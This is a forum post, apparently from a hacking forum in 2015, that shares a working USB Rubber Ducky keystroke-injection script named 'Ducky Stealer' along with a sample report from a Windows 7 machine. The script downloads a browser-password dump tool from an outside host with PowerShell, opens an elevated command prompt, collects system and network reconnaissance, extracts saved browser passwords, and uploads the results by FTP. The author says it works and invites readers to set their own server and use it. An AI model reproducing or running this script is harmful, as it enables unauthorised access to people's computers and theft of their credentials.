Well I finally decided fuck it and got a rubber ducky. Bored at work, hand wrote this script, will test at home and make modifications as nessesary.
REM ********************************
REM *** builddate28.5.2015 ***
REM *** DeepCopy's Ducky Stealer ***
REM *** v1.0 evilzone.org ***
REM ********************************
REM ********************************
REM *** Initial Delay ***
DELAY 2000
REM *** Download Dependancies ***
GUI r
DELAY 400
STRING cmd
DELAY 400
ENTER
GUI r
DELAY 400
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://upload.evilzone.org/?page=download&file=GePROYjEHwjSRNAZgXi9M0QPtLGj00bT3VBFy3mvvNDkwH95e8','%TEMP%\bpd.exe');
ENTER
DELAY 7000
REM *** UAC Bypass - Elevated CMD ***
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Start Stealer ***
STRING cd %TEMP%
ENTER
DELAY 400
STRING set num=%random%
ENTER
DELAY 200
STRING set report=%USERNAME%-%num%
ENTER
DELAY 200
STRING echo DeepCopy's Ducky Stealer v1.0 > %report%.txt
ENTER
DELAY 300
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING echo System Reconnaissance >> %report%.txt
ENTER
DELAY 200
STRING systeminfo >> %report%.txt
ENTER
DELAY 11000
STRING tasklist /v >> %report%.txt
ENTER
DELAY 400
STRING net start >> %report%.txt
ENTER
DELAY 500
STRING net user >> %report%.txt
ENTER
DELAY 300
STRING echo IP Information: >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING ipconfig /all >> %report%.txt
ENTER
DELAY 400
STRING nslookup myip.opendns.com resolver1.opendns.com >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 1000
STRING echo Drives and Directories: >> %report%.txt
ENTER
DELAY 1000
STRING mountvol >> %report%.txt
ENTER
STRING cd %programfiles%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %programfiles(x86)%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %TEMP%
ENTER
STRING echo. >> %report%.txt
ENTER
DELAY 100
STRING echo Website Save Passwords: >> %report%.txt
ENTER
DELAY 400
STRING bpd.exe -f webpass.txt
ENTER
DELAY 7000
STRING copy %report%.txt + webpass.txt %report%.txt
ENTER
REM *** Create FTP Profile ***
STRING echo user user>ftp.dcs
ENTER
STRING echo pass>>ftp.dcs
ENTER
STRING echo cd htdocs>>ftp.dcs
ENTER
STRING echo PUT %report%.txt>>ftp.dcs
ENTER
STRING echo quit>>ftp.dcs
ENTER
STRING ftp -n -s:ftp.dcs ftp.server
ENTER
DELAY 5000
REM *** Melt Harvested Information ***
REM STRING del /f /q *.dcs
REM ENTER
REM STRING del /f /q *.exe
REM ENTER
REM STRING del /f /q *.txt
REM ENTER
STRING exit
ENTER
REM *** Notify Script is Done ***
GUI r
DELAY 600
STRING notepad
ENTER
DELAY 1000
STRING I'm done master
DELAY 4000
ALT F4
STRING n
ENTER
Edit:
I made some changes, some things wouldn't have worked... I'm sorting out some hosting issues and then I will test it out
EDIT 5/30/15
Finally working... I will edit and clean up this thread and post what it does, but for now, read the report output (done from a live win 7 x64 system) and you'll get the hint. To use the script on your own ducky/nethunter device, simply change FTP setting for your server and you're good to go to use my script.. I will create a twin duck version possibly for offline use (download and reports will be on the USB.
Example output:
DeepCopy's Ducky Stealer v1.0
System Reconnaissance
Host Name: xxxx-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: xxxx
Registered Organization:
Product ID: xxx-OEM-xxxx-xxx
Original Install Date: 7/22/2013, 11:50:51 AM
System Boot Time: 5/30/2015, 9:12:46 PM
System Manufacturer: HP-Pavilion
System Model: VT493AA-ABA s5212y
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2500 Mhz
BIOS Version: Phoenix Technologies, LTD 5.24, 6/19/2009
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,061 MB
Available Physical Memory: 1,724 MB
Virtual Memory: Max Size: 6,121 MB
Virtual Memory: Available: 4,548 MB
Virtual Memory: In Use: 1,573 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\xxxx-PC
Hotfix(s): 347 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB971033
[08]: KB2506143
[09]: KB2479943
[10]: KB2484033
[11]: KB2488113
[12]: KB2491683
[13]: KB2503665
[14]: KB2505438
[15]: KB2506014
[16]: KB2506212
[17]: KB2506928
[18]: KB2509553
[19]: KB2511250
[20]: KB2511455
[21]: KB2515325
[22]: KB2522422
[23]: KB2529073
[24]: KB2532531
[25]: KB2533552
[26]: KB2534111
[27]: KB2536275
[28]: KB2536276
[29]: KB2541014
[30]: KB2544893
[31]: KB2545698
[32]: KB2547666
[33]: KB2552343
[34]: KB2560656
[35]: KB2563227
[36]: KB2564958
[37]: KB2570947
[38]: KB2574819
[39]: KB2579686
[40]: KB2584146
[41]: KB2585542
[42]: KB2603229
[43]: KB2604115
[44]: KB2618451
[45]: KB2619339
[46]: KB2620704
[47]: KB2620712
[48]: KB2621440
[49]: KB2631813
[50]: KB2640148
[51]: KB2644615
[52]: KB2645640
[53]: KB2647753
[54]: KB2653956
[55]: KB2654428
[56]: KB2655992
[57]: KB2656356
[58]: KB2656373
[59]: KB2656411
[60]: KB2658846
[61]: KB2659262
[62]: KB2660075
[63]: KB2660649
[64]: KB2661254
[65]: KB2667402
[66]: KB2676562
[67]: KB2679255
[68]: KB2685811
[69]: KB2685813
[70]: KB2685939
[71]: KB2686831
[72]: KB2688338
[73]: KB2690533
[74]: KB2691442
[75]: KB2698365
[76]: KB2699779
[77]: KB2705219
[78]: KB2709630
[79]: KB2709981
[80]: KB2712808
[81]: KB2718704
[82]: KB2719857
[83]: KB2719985
[84]: KB2724197
[85]: KB2726535
[86]: KB2727528
[87]: KB2729094
[88]: KB2729452
[89]: KB2732059
[90]: KB2732487
[91]: KB2732500
[92]: KB2735855
[93]: KB2736233
[94]: KB2736422
[95]: KB2739159
[96]: KB2741355
[97]: KB2742599
[98]: KB2743555
[99]: KB2749655
[100]: KB2750841
[101]: KB2753842
[102]: KB2756921
[103]: KB2757638
[104]: KB2758857
[105]: KB2761217
[106]: KB2762895
[107]: KB2763523
[108]: KB2770660
[109]: KB2773072
[110]: KB2779030
[111]: KB2779562
[112]: KB2785220
[113]: KB2786081
[114]: KB2786400
[115]: KB2789645
[116]: KB2790113
[117]: KB2791765
[118]: KB2798162
[119]: KB2799926
[120]: KB2800095
[121]: KB2803821
[122]: KB2804579
[123]: KB2807986
[124]: KB2808679
[125]: KB2809215
[126]: KB2809900
[127]: KB2813170
[128]: KB2813347
[129]: KB2813430
[130]: KB2813956
[131]: KB2820197
[132]: KB2820331
[133]: KB2823180
[134]: KB2830290
[135]: KB2832414
[136]: KB2833946
[137]: KB2834140
[138]: KB2834886
[139]: KB2835361
[140]: KB2835364
[141]: KB2836502
[142]: KB2836943
[143]: KB2839894
[144]: KB2840149
[145]: KB2840631
[146]: KB2843630
[147]: KB2844286
[148]: KB2845187
[149]: KB2845690
[150]: KB2846960
[151]: KB2847077
[152]: KB2847311
[153]: KB2847927
[154]: KB2849470
[155]: KB2850851
[156]: KB2852386
[157]: KB2853952
[158]: KB2857650
[159]: KB2861191
[160]: KB2861698
[161]: KB2861855
[162]: KB2862152
[163]: KB2862330
[164]: KB2862335
[165]: KB2862966
[166]: KB2862973
[167]: KB2863058
[168]: KB2863240
[169]: KB2864058
[170]: KB2864202
[171]: KB2868038
[172]: KB2868116
[173]: KB2868623
[174]: KB2868626
[175]: KB2868725
[176]: KB2871997
[177]: KB2872339
[178]: KB2875783
[179]: KB2876284
[180]: KB2876315
[181]: KB2876331
[182]: KB2882822
[183]: KB2883150
[184]: KB2884256
[185]: KB2887069
[186]: KB2888049
[187]: KB2891804
[188]: KB2892074
[189]: KB2893294
[190]: KB2893519
[191]: KB2893984
[192]: KB2894844
[193]: KB2898785
[194]: KB2898857
[195]: KB2900986
[196]: KB2901112
[197]: KB2904266
[198]: KB2908783
[199]: KB2909210
[200]: KB2909921
[201]: KB2911501
[202]: KB2912390
[203]: KB2913152
[204]: KB2913431
[205]: KB2913602
[206]: KB2916036
[207]: KB2918077
[208]: KB2918614
[209]: KB2919469
[210]: KB2922229
[211]: KB2923545
[212]: KB2925418
[213]: KB2926765
[214]: KB2928562
[215]: KB2929437
[216]: KB2929733
[217]: KB2929755
[218]: KB2929961
[219]: KB2930275
[220]: KB2931356
[221]: KB2936068
[222]: KB2937610
[223]: KB2939576
[224]: KB2943357
[225]: KB2949927
[226]: KB2952664
[227]: KB2953522
[228]: KB2957189
[229]: KB2957503
[230]: KB2957509
[231]: KB2957689
[232]: KB2961072
[233]: KB2962872
[234]: KB2964358
[235]: KB2964444
[236]: KB2965788
[237]: KB2966583
[238]: KB2968294
[239]: KB2970228
[240]: KB2971850
[241]: KB2972100
[242]: KB2972211
[243]: KB2972280
[244]: KB2973112
[245]: KB2973201
[246]
Network Card(s): 1 NIC(s) Installed.
[01]: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: xx.xxx.xx.xx
IP address(es)
[01]: xx.xxx.xx.xxx
[02]: xxxx::xxxx:xxxx:xxxx:xxxx
[03]: xxxx:xxx:xxxx:xx:xxxx:xxxx:xxxx:xxxx
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 24 K Unknown NT AUTHORITY\SYSTEM 0:56:14 N/A
System 4 Services 0 6,740 K Unknown N/A 0:00:22 N/A
smss.exe 832 Services 0 1,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 992 Services 0 4,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wininit.exe 364 Services 0 4,380 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 384 Console 1 9,100 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
winlogon.exe 436 Console 1 7,196 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 480 Services 0 9,888 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
lsass.exe 496 Services 0 12,488 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
lsm.exe 508 Services 0 4,124 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 804 Services 0 9,344 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 996 Services 0 8,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1044 Services 0 23,732 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1108 Services 0 126,036 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
svchost.exe 1152 Services 0 21,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1184 Services 0 39,900 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 1300 Services 0 5,844 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1432 Services 0 15,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
spoolsv.exe 1552 Services 0 14,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1592 Services 0 14,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
armsvc.exe 1776 Services 0 3,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhost.exe 1856 Console 1 17,148 K Running xxx-PC\xxx 0:00:00 MCI command handling window
agr64svc.exe 1960 Services 0 2,696 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 1968 Console 1 28,584 K Running xxx-PC\xxx 0:00:31 DWM Notification Window
mDNSResponder.exe 2020 Services 0 5,824 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2044 Services 0 8,580 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
DymoPnpService.exe 1336 Services 0 20,228 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
explorer.exe 1688 Console 1 79,496 K Running xxx-PC\xxx 0:00:24 N/A
hkcmd.exe 2180 Console 1 6,180 K Running xxx-PC\xxx 0:00:00 N/A
igfxsrvc.exe 2256 Console 1 6,048 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
igfxpers.exe 2316 Console 1 6,036 K Running xxx-PC\xxx 0:00:00 PersistWndName
svchost.exe 2552 Services 0 11,588 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
PSANHost.exe 2668 Services 0 20,760 K Unknown NT AUTHORITY\SYSTEM 0:00:33 N/A
AgentSvc.exe 2796 Services 0 15,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAMain.exe 2868 Console 1 564 K Running xxx-PC\xxx 0:00:01 TryBarAPPAV
PhoneMyPC_Helper.exe 3056 Services 0 15,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAService.exe 2352 Services 0 404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PhoneMyPC.exe 2476 Console 1 19,504 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2160 Services 0 12,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OSPPSVC.EXE 3828 Services 0 11,876 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
SearchIndexer.exe 3912 Services 0 24,840 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
WUDFHost.exe 3968 Services 0 6,164 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wmpnetwk.exe 3636 Services 0 10,216 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 3092 Services 0 5,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
IntuitUpdateService.exe 1796 Services 0 3,720 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 4512 Services 0 26,572 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 1584 Services 0 11,772 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
chrome.exe 4580 Console 1 97,716 K Running xxx-PC\xxx 0:00:26 [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP) - Google Chrome
chrome.exe 4084 Console 1 109,348 K Unknown xxx-PC\xxx 0:00:05 N/A
chrome.exe 3472 Console 1 31,172 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3140 Console 1 9,256 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3268 Console 1 62,012 K Unknown xxx-PC\xxx 0:00:16 N/A
chrome.exe 4928 Console 1 62,448 K Unknown xxx-PC\xxx 0:00:05 N/A
audiodg.exe 1600 Services 0 17,528 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
WmiPrvSE.exe 4396 Services 0 6,732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 4492 Console 1 2,908 K Running xxx-PC\xxx 0:00:00 Administrator: C:\Windows\system32\cmd.exe - tasklist /v
conhost.exe 2152 Console 1 5,888 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
WmiPrvSE.exe 2680 Services 0 12,128 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 4836 Services 0 5,824 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
TrustedInstaller.exe 3108 Services 0 14,028 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
tasklist.exe 1212 Console 1 5,980 K Unknown xxx-PC\xxxxx 0:00:00 N/A
These Windows services are started:
Adobe Acrobat Update Service
Agere Modem Call Progress Audio
Application Experience
Application Information
Base Filtering Engine
Bonjour Service
CNG Key Isolation
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Diagnostic System Host
Diagnostics Tracking Service
Distributed Link Tracking Client
DNS Client
DYMO PnP Service
Encrypting File System (EFS)
Function Discovery Provider Host
Function Discovery Resource Publication
Group Policy Client
HomeGroup Listener
HomeGroup Provider
Human Interface Device Access
IKE and AuthIP IPsec Keying Modules
Intuit Update Service v4
IP Helper
IPsec Policy Agent
Multimedia Class Scheduler
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Office Software Protection Platform
Offline Files
Panda Devices Agent
Panda Product Service
Panda Protection Service
Peer Name Resolution Protocol
Peer Networking Grouping
Peer Networking Identity Manager
Plug and Play
PnP-X IP Bus Enumerator
Portable Device Enumerator Service
Power
Print Spooler
Program Compatibility Assistant Service
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
SSDP Discovery
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
WebClient
Windows Audio
Windows Audio Endpoint Builder
Windows Connect Now - Config Registrar
Windows Defender
Windows Driver Foundation - User-mode Driver Framework
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Media Player Network Sharing Service
Windows Modules Installer
Windows Search
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
The command completed successfully.
User accounts for \\xxxx-PC
-------------------------------------------------------------------------------
Administrator Guest xxxx
The command completed successfully.
IP Information:
Windows IP Configuration
Host Name . . . . . . . . . . . . : xxxx-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xxxx.xx.xxxxxxx.net
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Physical Address. . . . . . . . . : xx-xx-xx-xx-xx-xx
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:558:6045:5e:147b:10a5:b298:a98e(Preferred)
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:36:50 PM
Lease Expires . . . . . . . . . . : Wednesday, June 03, 2015 9:36:50 PM
Link-local IPv6 Address . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx(Preferred)
IPv4 Address. . . . . . . . . . . : x.xxx.xx.xxx(Preferred)
Subnet Mask . . . . . . . . . . . : xxx.xxx.xxx.x
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:30:00 PM
Lease Expires . . . . . . . . . . : Saturday, May 30, 2015 10:30:00 PM
Default Gateway . . . . . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx
xx.xx.xx.xx
DHCP Server . . . . . . . . . . . : xx.xx.xx.xx
DHCPv6 IAID . . . . . . . . . . . : xxxx
DHCPv6 Client DUID. . . . . . . . : xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx
DNS Servers . . . . . . . . . . . : 2001:558:feed::1
2001:558:feed::2
xx.xx.xx.xx
xx.xx.xx.xx
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
xxxx.xx.xxxxxxx.net
Tunnel adapter isatap.hsd1.ca.comcast.net.:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: resolver1.opendns.com
Address: 208.67.222.222
Name: myip.opendns.com
Address: xxx.xxx.xxx.xxx
Drives and Directories:
Creates, deletes, or lists a volume mount point.
MOUNTVOL [drive:]path VolumeName
MOUNTVOL [drive:]path /D
MOUNTVOL [drive:]path /L
MOUNTVOL [drive:]path /P
MOUNTVOL /R
MOUNTVOL /N
MOUNTVOL /E
path Specifies the existing NTFS directory where the mount
point will reside.
VolumeName Specifies the volume name that is the target of the mount
point.
/D Removes the volume mount point from the specified directory.
/L Lists the mounted volume name for the specified directory.
/P Removes the volume mount point from the specified directory,
dismounts the volume, and makes the volume not mountable.
You can make the volume mountable again by creating a volume
mount point.
/R Removes volume mount point directories and registry settings
for volumes that are no longer in the system.
/N Disables automatic mounting of new volumes.
/E Re-enables automatic mounting of new volumes.
Possible values for VolumeName along with current mount points are:
\\?\Volume{899bc397-f2f5-11e2-b4be-806e6f6e6963}\
*** NO MOUNT POINTS ***
\\?\Volume{899bc398-f2f5-11e2-b4be-806e6f6e6963}\
C:\
\\?\Volume{899bc3a4-f2f5-11e2-b4be-806e6f6e6963}\
F:\
\\?\Volume{899bc3a8-f2f5-11e2-b4be-806e6f6e6963}\
G:\
\\?\Volume{899bc39b-f2f5-11e2-b4be-806e6f6e6963}\
D:\
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
02/06/2015 04:12 PM <DIR> Android
06/22/2014 11:24 AM <DIR> Apache Software Foundation
09/03/2014 08:44 PM <DIR> Bonjour
08/21/2013 01:11 PM <DIR> CCleaner
01/24/2014 10:45 AM <DIR> Common Files
02/12/2014 04:29 PM <DIR> DIFX
04/12/2011 01:28 AM <DIR> DVD Maker
07/22/2013 02:38 PM <DIR> HP
05/13/2015 05:38 PM <DIR> Internet Explorer
02/06/2015 04:09 PM <DIR> Java
07/22/2013 03:11 PM <DIR> LSI SoftModem
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
04/12/2011 01:28 AM <DIR> Microsoft Games
07/30/2013 12:00 PM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft SQL Server Compact Edition
07/30/2013 12:00 PM <DIR> Microsoft Synchronization Services
07/13/2009 10:32 PM <DIR> MSBuild
07/22/2013 02:54 PM <DIR> Realtek
07/13/2009 10:32 PM <DIR> Reference Assemblies
01/05/2014 12:05 PM <DIR> SAMSUNG
07/04/2014 02:06 PM <DIR> SoftwareForMe Inc
07/23/2013 03:28 AM <DIR> Windows Defender
05/13/2015 05:37 PM <DIR> Windows Journal
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
07/30/2013 11:47 AM <DIR> WinRAR
1 File(s) 2,010 bytes
32 Dir(s) 125,307,084,800 bytes free
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files (x86)
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
10/01/2013 12:11 AM <DIR> Adobe
01/27/2014 12:07 AM <DIR> Antenna
04/25/2015 04:03 PM <DIR> ArtCine NFO Creator 2.0
04/25/2015 07:04 PM <DIR> Audacity
09/03/2014 08:44 PM <DIR> Bonjour
07/27/2014 05:37 PM <DIR> Breaktru Software
02/06/2015 04:10 PM <DIR> Common Files
08/20/2014 07:38 PM <DIR> DYMO
06/13/2014 12:27 AM <DIR> FileZilla FTP Client
01/24/2014 10:37 AM <DIR> Free Download Manager
03/11/2015 07:45 AM <DIR> Google
07/22/2013 02:38 PM <DIR> HP
06/13/2014 01:48 AM <DIR> iCare Data Recovery
04/04/2015 01:28 PM <DIR> ImageWriter
05/13/2015 05:38 PM <DIR> Internet Explorer
02/20/2015 01:43 AM <DIR> Java
02/12/2014 04:29 PM <DIR> LeapFrog
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
07/30/2013 11:58 AM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft.NET
06/13/2014 01:51 AM <DIR> MiniTool Partition Wizard Professional Edition 8.1
05/02/2015 09:03 PM <DIR> Mozilla Firefox
05/28/2015 04:21 PM <DIR> Mozilla Maintenance Service
07/13/2009 10:32 PM <DIR> MSBuild
01/24/2014 10:42 AM <DIR> MSXML 4.0
03/11/2015 07:45 AM <DIR> NCH Software
01/28/2014 11:51 PM <DIR> Nuance
06/12/2014 01:44 AM <DIR> Panda Security
07/13/2009 10:32 PM <DIR> Reference Assemblies
02/06/2015 02:55 PM <DIR> TurboTax
12/19/2014 06:13 PM <DIR> TypingMaster
07/23/2013 03:28 AM <DIR> Windows Defender
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
1 File(s) 2,584 bytes
42 Dir(s) 125,307,080,704 bytes free
Website Save Passwords:
**********************************************
Browser Password Recovery Report
**********************************************
Browser: Google Chrome
Website: https://mfasa.chase.com/auth/login.html
Username: lololol
Password: olololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://segment.com/login
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: lololol
Username: lololol
Password: lololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://www.registry.cu.cc/checklogin.php
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://my.bluehost.com/web-hosting/cplogin
Username: lololololol
Password: lololololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://panel.byethost.com/login.php
Username: lololol
Password: lolol
---------------------------------------------------------------------------
_______________________________________________________________________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com
�
